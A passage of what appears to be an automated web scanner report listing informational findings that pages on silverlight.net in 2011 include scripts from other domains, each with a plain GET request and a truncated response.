http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50603
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.601. http://www.silverlight.net/community/samples/silverlight-samples/animated-note-control-37395/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/animated-note-control-37395/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/animated-note-control-37395/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23259
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.602. http://www.silverlight.net/community/samples/silverlight-samples/babysmash7-wp7-app-37425/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/babysmash7-wp7-app-37425/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/babysmash7-wp7-app-37425/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23273
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.603. http://www.silverlight.net/community/samples/silverlight-samples/childwindow-effects-37469/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/childwindow-effects-37469/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/childwindow-effects-37469/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23262
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.604. http://www.silverlight.net/community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23357
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.605. http://www.silverlight.net/community/samples/silverlight-samples/infragistics-xamgrid-37452/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/infragistics-xamgrid-37452/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/infragistics-xamgrid-37452/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23316
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.606. http://www.silverlight.net/community/samples/silverlight-samples/rated/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/rated/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/rated/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49602
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.607. http://www.silverlight.net/community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23460
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.608. http://www.silverlight.net/community/samples/upload/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/upload/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/upload/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12674
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Upload You
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.609. http://www.silverlight.net/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /contact.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17764
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Contact Us
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.610. http://www.silverlight.net/getstarted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getstarted/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /getstarted/ HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:11 GMT
Content-Length: 25546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Get Starte
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.611. http://www.silverlight.net/getstarted/devices/details.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getstarted/devices/details.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /getstarted/devices/details.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12831
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Offici
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.612. http://www.silverlight.net/getstarted/devices/symbian/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getstarted/devices/symbian/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /getstarted/devices/symbian/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15591
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.613. http://www.silverlight.net/getstarted/devices/windows-phone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getstarted/devices/windows-phone/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /getstarted/devices/windows-phone/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17451
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.614. http://www.silverlight.net/getstarted/overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getstarted/overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /getstarted/overview.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75954
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Overview :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.615. http://www.silverlight.net/learn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27079
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Learn : Th
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.616. http://www.silverlight.net/learn/books/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/books/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/books/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45079
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Books : Th
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.617. http://www.silverlight.net/learn/dynamic-languages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/dynamic-languages/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js
http://gestalt.ironpython.net/dlr-latest.js

Request

GET /learn/dynamic-languages/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27860
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Dynamic La
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://gestalt.ironpython.net/dlr-latest.js"></script>
...[SNIP]...

23.618. http://www.silverlight.net/learn/handsonlabs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/handsonlabs/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/handsonlabs/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 121077
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Hands On L
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.619. http://www.silverlight.net/learn/international/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/international/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/international/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25404
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Internatio
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.620. http://www.silverlight.net/learn/pivotviewer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/pivotviewer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js
http://www.microsoft.com/silverlight/scripts/Silverlight.js

Request

